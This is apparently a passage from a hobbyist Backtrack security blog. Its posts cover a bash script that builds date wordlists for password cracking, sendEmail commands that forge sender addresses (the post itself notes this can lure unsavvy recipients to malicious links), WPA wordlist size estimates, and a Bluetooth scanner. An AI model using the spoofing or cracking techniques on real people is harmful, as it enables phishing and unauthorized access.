invasive on the eyes for the command line freaks and hopefully a tad quicker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist_v0-4.jpg" width="640" /></a></div>
<br />
<br />
<br />
<div style="color: red;">
<b>Update 1</b></div>
<div style="color: red;">
<b>======= </b><br />
<br /></div>
Put up a quick video on a revision; datelist_v0.3 <br />
<iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/FEXbxbjh-eU" title="YouTube video player" width="480"></iframe><br />
<br />
<div style="color: red;">
<b>=======</b></div>
<br />
I occasionally get queries on how to create certain wordlists with crunch, for which in some cases<br />
crunch is not really suited.<br />
This is the case when dealing with dates for instance.<br />
<br />
I had asked bofh28 (author of crunch) whether he felt that this was something to consider for inclusion<br />
in crunch, however he did not feel this was within the scope of what crunch is intended for and of course<br />
he's right, crunch's scope is meant to create a true bruteforce list.<br />
<br />
<br />
So, after having had a few queries on it, I dabbled a bit in how this could be done.<br />
<br />
<br />
After quite a bit of brain teasing (I am a slow learner ;) ) I got a date list in the format ddmmyyyy with the following code ;<br />
>copy/paste the below code and save as for instance date-test<br />
>make executable with: <span style="color: lime;">chmod 755 date-test</span> to allow to run it; <span style="color: lime;">./date-test</span><br />
<br />
<span style="color: lime;">#!/bin/bash -e</span><br />
<span style="color: lime;">#Starting and stopping dates</span><br />
<span style="color: lime;">echo "Enter the starting date"</span><br />
<span style="color: lime;">echo "must be in the format yyyy-mm-dd"</span><br />
<span style="color: lime;">(tput bold && tput setaf 1)</span><br />
<span style="color: lime;">read START_DATE</span><br />
<span style="color: lime;">(tput sgr 0) </span><br />
<span style="color: lime;">echo "Enter the ending date"</span><br />
<span style="color: lime;">echo "must be in the format yyyy-mm-dd"</span><br />
<span style="color: lime;">(tput bold && tput setaf 1)</span><br />
<span style="color: lime;">read END_DATE</span><br />
<span style="color: lime;">(tput sgr 0)</span><br />
<span style="color: lime;"># List all dates in between the chosen dates in the format ddmmyyyy</span><br />
<span style="color: lime;">echo $START_DATE | tee r_dates.txt</span><br />
<span style="color: lime;">while true</span><br />
<span style="color: lime;">do</span><br />
<span style="color: lime;">START_DATE=$( date +%Y-%m-%d -d "$START_DATE -d 1day" )</span><br />
<span style="color: lime;">echo $START_DATE | tee -a r_dates.txt</span><br />
<span style="color: lime;">if [ "$START_DATE" == "$END_DATE" ]</span><br />
<span style="color: lime;">then </span><br />
<span style="color: lime;">awk -F- '{print $3 $2 $1}' r_dates.txt > datelist.txt</span><br />
<span style="color: lime;">rm r_dates.txt</span><br />
<span style="color: lime;">echo</span><br />
<span style="color: lime;">(tput setaf 2 && tput bold)</span><br />
<span style="color: lime;">echo "wordlist 'datelist.txt' created in the format ;"</span><br />
<span style="color: lime;">echo</span><br />
<span style="color: lime;">(tput setaf 6 && tput bold)</span><br />
<span style="color: lime;">head -5 datelist.txt</span><br />
<span style="color: lime;">(tput sgr 0)</span><br />
<span style="color: lime;">echo ""</span><br />
<span style="color: lime;">exit</span><br />
<span style="color: lime;">fi</span><br />
<span style="color: lime;">done</span><br />
<br />
Not an easy few lines for me to remember.. at least for me..<br />
So after having done that, there was some desire to be able to change the output format to other formats,<br />
we each have our own preference !<br />
<br />
Going through it a bit more and trying to improve it I came up with datelist v0.2<br />
Now I am sure there must be easier ways to accomplish the same thing.. but it just simply escaped me.. <br />
<br />
Basically a pretty untidy mess code-wise, but it seems to more or less do the trick.<br />
<br />
Following a query on how to make a certain wordlist, I also included a possibility<br />
to either prepend or append additional numbers (max 5) to the created wordlist.<br />
I am not sure that the way it is done is the most effective and will probably re-visit that part. <br />
<br />
<br />
<span style="color: red;">If anyone feels like having a shot at trying it out, you can download it</span> <span style="color: red;">here</span>;<br />
Edit 23-12-2011<br />
All previous versions superceded by v0.6, see download link at top of page.<br />
<br />
Starting it up (of course use filename that is appropriate for the download you have done);<br />
<br />
<div style="color: lime;">
./datelist</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist01.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Starting with format option -1 used and entering the Start and End dates ;<br />
<br />
<div style="color: lime;">
./datelist -1</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist02.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Starting .. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist03.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Upon completion of the creation of datelist.txt, the 1st 5 lines of the created file will be shown to confirm<br />
the output format.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist04.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: #6aa84f;">
<u><b>APPENDING OR PREPENDING SEQUENTIAL NUMBERS </b></u></div>
<br />
I also included a method of appending or prepending upto 5 sequential numeric values(0-9) to the created datelist.txt file. <br />
Not quite sure how useful this is or to whom.. not really for me, but hey, the question came up ;)<br />
<br />
This can be done with the -a (append) or -p (prepend) after having created the datelist.txt file.<br />
<br />
Appending 2 numeric characters sequentially with the -a switch and showing the result by showing the last<br />
5 lines of the file.<br />
<br />
<div style="color: lime;">
./datelist -a</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist05.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Prepending 2 numeric characters sequentially with the -p switch and showing the result by showing the last<br />
5 lines of the file.<br />
<br />
<div style="color: lime;">
./datelist -p</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/datelist06.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Again, this is all just a bit of fun and most likely ludicrously funny to anyone able to really write,<br />
but who knows it may be of use to someone ;)<br />
<br />
<div style="color: yellow;">
<b>Video showing the use of datelist (v0.3) </b></div>
<br />
<b><a href="http://blip.tv/file/4842595">http://blip.tv/file/4842595</a></b><br />
or<br />
<b><a href="http://www.youtube.com/watch?v=FEXbxbjh-eU">http://www.youtube.com/watch?v=FEXbxbjh-eU</a></b><br />
<br />
Dont be shy on commenting if its any help or simply worthless :D</div>Unknownnoreply@blogger.com46tag:blogger.com,1999:blog-8356530514965708840.post-12176357883102108112011-02-15T16:13:00.002+01:002011-02-15T16:22:16.456+01:00sendEmail<div style="color: #6aa84f;"><u><b>FUN WITH EMAIL</b></u></div><br />
<br />
sendEmail in installed by default on the backtrack OS, and the options can simply be checked by typing ;<br />
<br />
<div style="color: lime;">sendEmail</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="353" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail01.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Make sure your ISP does not have any problems with the use of sendEmail prior to sending loads of mails<br />
to your roomate from MeganFox@movieworld.com .. <br />
<br />
This is by no means an anonymous emailing method, there will always be IP address details mentioned in the email headers and you need to specify the smtp server to use.<br />
You can specify to use the smtp server of the connection you have in place, or you can specify to use for instance the gmail smtp server.<br />
When using the gmail smtp server however, the gmail address will be seen as the <b>reply </b>address.<br />
<br />
<br />
Also, it is quite likely that some of the messages made such as the below examples will be picked up as spam..<br />
YMMV depending on how often you test on certain addresses.<br />
<br />
<br />
In any case, for an unsuspecting, not too savvy recipient.. it can lure the recipient to malafoid webpages or entice to open attachments etc.<br />
<br />
<div style="color: #6aa84f;"><u><b>SENDING BASIC EMAIL</b></u></div><br />
So lets start off by creating a simple message, sending it to my gmail account using my ISP's smtp server; <br />
(do a google on <b>smtp servers</b> to find the one your ISP is using) <br />
<br />
<span style="color: lime;">-f</span> From (sender) email address<br />
<span style="color: lime;">-t</span> To email address<br />
<span style="color: lime;">-u</span> Subject (in quotes)<br />
<span style="color: lime;">-m</span> Message body<br />
<span style="color: lime;">-s</span> smtp server<br />
<br />
I will seperate the commands partially using backslash <span style="color: lime;">\</span> as I get confused with long lines :) <br />
<br />
It is important to note that some special characters such as an exclamation mark, can cause problems in the subject line / message line depending on single or double quotes used.<br />
<br />
<div style="color: lime;">sendEmail -f megan.fox@movieworld.com<megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@filmworld.com><megan.fox@filmworld.com> -t MyEmail@gmail.com \</megan.fox@filmworld.com></megan.fox@filmworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com><br />
<megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@filmworld.com><megan.fox@filmworld.com>-u "Enjoyed meeting you at the party good-looking ;)" \ </megan.fox@filmworld.com></megan.fox@filmworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com><br />
<megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@filmworld.com><megan.fox@filmworld.com>-m "We sure had a good time didnt we, cant wait to see you again .. " \</megan.fox@filmworld.com></megan.fox@filmworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com><br />
<megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@movieworld.com><megan.fox@filmworld.com><megan.fox@filmworld.com>-s smtp.isp</megan.fox@filmworld.com></megan.fox@filmworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com></megan.fox@movieworld.com></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail02.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As received in gmail (this one got caught as being spam as I had tested it a few times in quick succession) ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;"> <a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail03.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now my better half would never believe that I actually met Megan Fox at a party or that she was so thunderstruck by my charming self she thought it necessary to email me..<br />
But hey, you get the idea ;) <br />
<br />
<br />
<div style="color: #6aa84f;"><u><b>USING STDIN FOR MESSAGE INPUT</b></u></div><br />
If we want to be able to write a bit more in the email body, simply leave out the -m option, and sendEmail will read from STDIN, you will be prompted to enter a message after entering the command and then press Ctrl+D<br />
(on its own line) to have it read and then sent ;<br />
Lets use an example which the better halves will appreciate a bit more, like sending an email to your wife on Valentine's Day.. yeah...what a romantic..<br />
<br />
<div style="color: lime;">sendEmail -f Secret.Admirer@secret.com<your.valentine@valentine.com><secret.admirer@admirers.com> -t BetterHalf@gmail.com \</secret.admirer@admirers.com></your.valentine@valentine.com><br />
<your.valentine@valentine.com><secret.admirer@admirers.com>-u "Will you be my valentine?" \</secret.admirer@admirers.com></your.valentine@valentine.com><br />
<your.valentine@valentine.com><secret.admirer@admirers.com> -s smtp.isp</secret.admirer@admirers.com></your.valentine@valentine.com></div><br />
You will then be presented with;<br />
<i>Reading message body from STDIN because the '-m' option was not used.</i><br />
<i>If you are manually typing in a message:</i><br />
<i> - First line must be received within 60 seconds.</i><br />
<i> - End manual input with a CTRL-D on its own line.</i><br />
<br />
So type the desired message and when finished make sure you hit enter to get to a free / blank line, then<br />
hit CTR+D ; <br />
<div style="color: yellow;">Roses are Red</div><div style="color: yellow;">Violets are Blue</div><div style="color: yellow;">Sugar is Sweet</div><div style="color: yellow;">And so are You !</div><span style="color: lime;">Ctrl+D</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail04.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As received in gmail ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail05.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now if that doesn't get an appreciative smile / freebie to grab another beer, then you must have really been snoring the night before..<br />
<br />
<div style="color: #6aa84f;"><br />
</div><div style="color: #6aa84f;"><u><b>SENDING EMAIL WITH MESSAGE PRE-PREPARED IN TXT FILE</b></u></div><br />
You can also prepare a written message and have sendEmail enter this as the message body ;<br />
<br />
<div style="color: lime;">nano valentine</div><br />
<div style="color: yellow;">Will you be my Valentine ?</div><div style="color: yellow;">===================</div><div style="color: yellow;">Roses are Red<br />
Violets are Blue<br />
Sugar is Sweet<br />
And So Are You !<br />
<br />
HAPPY VALENTINE'S DAY !</div><div style="color: yellow;"></div><br />
Save and Exit; <span style="color: lime;">Ctrl+X --> Y</span><br />
<br />
<div style="color: lime;">sendEmail -f secret.admirer<your.valentine@valentine.com><secret.admirer@admirers.com>@secret.com -t BetterHalf@gmail.com \</secret.admirer@admirers.com></your.valentine@valentine.com><br />
<your.valentine@valentine.com><secret.admirer@admirers.com>-u "Will you be my valentine?" \</secret.admirer@admirers.com></your.valentine@valentine.com><br />
<your.valentine@valentine.com><secret.admirer@admirers.com>-o message-file=valentine \</secret.admirer@admirers.com></your.valentine@valentine.com><br />
<your.valentine@valentine.com><secret.admirer@admirers.com> -s smtp.isp</secret.admirer@admirers.com></your.valentine@valentine.com></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="294" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail06.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As received in gmail ;<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/sendEmail07.jpg" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: #6aa84f;"><u><b>USING GMAIL'S SMTP FOR SENDING MAIL</b></u></div><br />
In order to use gmail's smtp server, you have to specify your gmail username (with -xu) & password (with -xp).<br />
<br />
An example herebelow ;<br />
<br />
<div style="color: lime;">sendEmail -f DesiredEmail@whatever.com -t YourEmail@testaccount.com \</div><div style="color: lime;">-u "Testing Gmail smtp" \</div><div style="color: lime;">-m "Just a test for the gmail smtp" \</div><div style="color: lime;">-s smtp.gmail.com \</div><div style="color: lime;">-xu your.gmail@gmail.com \</div><div style="color: lime;">-xp gmailpassword</div><br />
When sending the message, the <b>return </b>address will always be your gmail account, also, the sent message will be stored in the gmail account being used.<br />
<br />
Of course there are quite a few more options, adding cc's / bcc's, including attachments, etc etc. <br />
<br />
<br />
Just a bit of fun, but goes to show that checking where certain emails come from is not a bad idea.<br />
<br />
<br />
Especially if they include links to sites or attachments..Unknownnoreply@blogger.com19tag:blogger.com,1999:blog-8356530514965708840.post-39714472101894143882010-09-27T09:50:00.018+02:002010-10-22T14:46:33.789+02:00Wordlist SizesThe post on <a href="http://adaywithtape.blogspot.com/2010/04/creating-wordlists-with-crunch-v23.html">creating wordlists with crunch v2.4</a> receives the most hits by far on my blog and from the<br />
queries in the comments section, it would seem that not everyone realises what the potential size can be<br />
when creating wordlists.<br />
<div style="color: red;"><br />
</div><i><b style="color: red;">EDIT</b></i><br />
<div style="color: red;"><i><b>====</b></i></div><i>Check out the latest revision of crunch, bofh28 just released v2.6 03-10-2010.</i><br />
<i>Crunch is now including a size estimate when starting up the wordlist generation, so you can see what size the wordlist you are planning will be.</i><br />
<i>That along with a few more new nice additions.</i><br />
<i>Download the latest crunch here;</i><br />
<i><a href="http://sourceforge.net/projects/crunch-wordlist/">http://sourceforge.net/projects/crunch-wordlist/</a></i><br />
<div style="color: red;"><i>Edit</i></div><i>latest revision of crunch now also included in the backtrack 4 repository.<br />
</i><br />
<br />
Lets say you are working on a wordlist for a WPA key (which always have a minimum of 8 characters)<br />
and lets say that you know for a fact that the passkey in question is an eight character combination of the following digits and letters;<br />
<div style="color: lime;">0123456789ABCDEF</div>(like some internet companies have on their broadband modem/routers where I am from).<br />
<br />
To create a wordlist with all possible combinations based on the passphrase having 8 characters only,<br />
you could use the following syntax in crunch;<br />
<br />
<div style="color: lime;">./crunch 8 8 0123456789ABCDEF -o wpa-list.txt</div><br />
That one line of code seems so simple, yet when you check the estimated size of the wordlist to be created<br />
you would definately think twice about trying to create, save and use it...<br />
<br />
<br />
The size of the wordlist can be calculated as follows ;<br />
<br />
(x^y) * (y+1) = size in bytes<br />
x = The number of characters being used to create the wordlist<br />
y = The number of characters the words/passphrases in the wordlist have. <br />
<br />
Based on the above example, we have 10 possible numeric values and 6 possible alpha values,<br />
so 16 characters in total, and we want to calculate based on a wordlist wherein the passphrases have 8 characters.<br />
To calculate what the size would be in konsole we can use "bc" ;<br />
<br />
<div style="color: lime;">echo "(16^8)*(8+1)" | bc</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bc-konsole.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="146" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bc-konsole.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or we can even just type it in google; <span style="color: lime;">(16^8)*(8+1)</span><br />
and it will return the same result ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/google-calc.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="280" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/google-calc.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Next we can check the conversions of the resulting size in KB / MB / GB etc. ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/byte-conv.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/byte-conv.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
thats quite a lot...<br />
<br />
<br />
I put together a (very!) simple script in order to be able to quickly check what kind of size one<br />
is looking at when thinking of creating a wordlist with the same min/max length in crunch;<br />
<div style="color: yellow;">crunch_size</div><br />
<div style="color: red;"><b>DOWNLOAD</b></div><a href="http://www.mediafire.com/file/dmh989dhmebch43/crunch_size-v0.2">http://www.mediafire.com/file/dmh989dhmebch43/crunch_size-v0.2</a><br />
<br />
After saving to your <span style="color: lime;">/root/</span> directory for instance, just run by entering ;<br />
<br />
<div style="color: lime;">./crunch_size-v0.2</div><br />
You need to enter ;<br />
> the number of characters to be used when creating the wordlist. (using the above example; <span style="color: red;">16</span>)<br />
> the length of the words/passphrases in the wordlist. (using the above example; <span style="color: red;">8</span>)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
You cant choose to check what the results would be with any fixed patterns, or variables, (have to leave the hard stuff like that to the pro's !) but it is still an eye-opener to see the sizes involved with a 'simple' wordlist.<br />
<br />
<br />
The result will show you the expected number of words/passphrases in the wordlist along with the estimated<br />
file size in bytes / Kilobytes / Megabytes / Gigabytes / Terabytes / Petabytes<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_size2.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Just a bit of fun and possibly handy to have in your crunch directory for reference ;)<br />
<br />
Please comment if I messed up on the calculations anywhere..Unknownnoreply@blogger.com17tag:blogger.com,1999:blog-8356530514965708840.post-53696399086979056852010-09-19T12:54:00.021+02:002011-02-02T14:32:33.822+01:00Bluetooth mayhem -- part III -- bluejay<div style="color: red;"><i>UPDATE</i></div><div style="color: red;"><i>=======</i></div>Uploaded a revision to bluejay bluetooth scanner; <br />
<span style="color: red;">Download link below</span><br />
<div style="color: blue;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-v03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-v03.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b style="color: red;">VIDEO </b>of an update again ;<br />
<br />
<a href="http://blip.tv/file/4240113">http://blip.tv/file/4240113</a><br />
<br />
File download;<br />
<a href="http://www.mediafire.com/file/6eacv5yez0eyv2z/bluejay">http://www.mediafire.com/file/6eacv5yez0eyv2z/bluejay</a><br />
<br />
<br />
Regrettably, the mayhem I was able to enjoy with bluetooth has basically been limited to scanning..<br />
<br />
All in all a rather disappointing outcome after quite a bit of time spent trying to get somewhere.<br />
<br />
I have tried to get the famous bluebugger & bluesnarfer to work, however the phones I have to test on do not seem to be vulnerable to the standard attacks and the tools do not seem to be well suited to Backtrack 4 without some serious tweaking.<br />
<br />
<br />
The bluetooth headsets I got don't seem to show up on any of the scans I do, so I couldn't even test carwhisper either.<br />
Bummer...<br />
Am going to continue to pick up cheapo headsets though as I would love to at least get <i>something</i> working...<br />
<br />
<br />
There is a serious lack of information on using bluetooth tools with backtrack 4 and I had hoped to be able to contribute to getting some more information out there, however for the time being I have to admit defeat on this one...<br />
<br />
<br />
The plus side of things is that it motivated me to write my own bluetooth scanner :D<br />
<br />
Considering that tools like ghettotooth are still included in backtrack 4, I saw no harm in making something similar, may even propose for it to be included if I am feeling cocky... <br />
<br />
<br />
So after a lot of trial and error and a hell of a lot of google, my first bash script ; <b><span style="color: #0b5394;">bluejay<span style="color: yellow;"></span></span></b><br />
<br />
Hopefully someone finds it fun to use, I had a lot of fun (along with frustration...) writing it.<br />
Although I am sure many looking at the code will probably sh1t themselves laughing, its my first attempt at any bash scripting with a bit of scavenging from teh interwebz... so hey ;)<br />
<br />
<br />
bluejay was written with backtrack 4 in mind, and is untested on any other platform.<br />
<br />
<div style="color: yellow;"><br />
</div><span style="color: yellow;">INSTALLATION & RUNNING</span><br />
<div style="color: yellow;">(based on using Backtrack 4)</div><div style="color: yellow;">=========================</div><span style="color: black;"> </span><br />
1. Download file from below link to a location of your choice (for instance <span style="color: lime;">/root/</span> ).<br />
<u><b>Download link ;</b></u><br />
See download link for bluejay v0.3 at top of page.<br />
<br />
2. Make a directory called "bluejay" in /pentest/bluetooth/;<br />
<div style="color: lime;">mkdir /pentest/bluetooth/bluejay</div><div style="color: red;"><u><i></i></u></div><div style="color: red;"><u><i>Note!</i></u></div><div style="color: red;">Creating the directory <span style="color: lime;">/pentest/bluetooth/bluejay/</span> is required as bluejay puts temp files in that location.</div><i>(Latest version of bluejay will ask if you want to and create directory automatically if you choose to continue)</i><br />
<br />
3. Copy or move the file into the created directory;<br />
<span style="color: lime;">mv /root/bluejay /pentest/bluetooth/bluejay/bluejay</span><br />
<br />
4. If you can't run bluejay, you may have to change file permissions ;<br />
<span style="color: lime;">chmod 755 /pentest/bluetooth/bluejay/bluejay</span><br />
<br />
5. Then run it ! ;<br />
<div style="color: lime;">cd /pentest/bluetooth/bluejay/</div><div style="color: lime;"></div><div style="color: lime;">./bluejay -h </div><br />
<br />
<br />
<div style="color: yellow;">HELP INFORMATION</div><span style="color: yellow;">================== </span><br />
<br />
<div style="color: lime;">./bluejay -h</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-h.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-h.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">LISTING AVAILABLE INTERFACES</div><span style="color: yellow;">============================ </span><br />
<br />
<span style="color: lime;">./bluejay -d</span><br />
<span style="color: lime;"></span>Result of listing devices when only 1 bluetooth interface present ; <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-single.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-single.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Result of listing devices when multiple bluetooth interfaces are installed ;<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="354" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bluejay-d-m.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
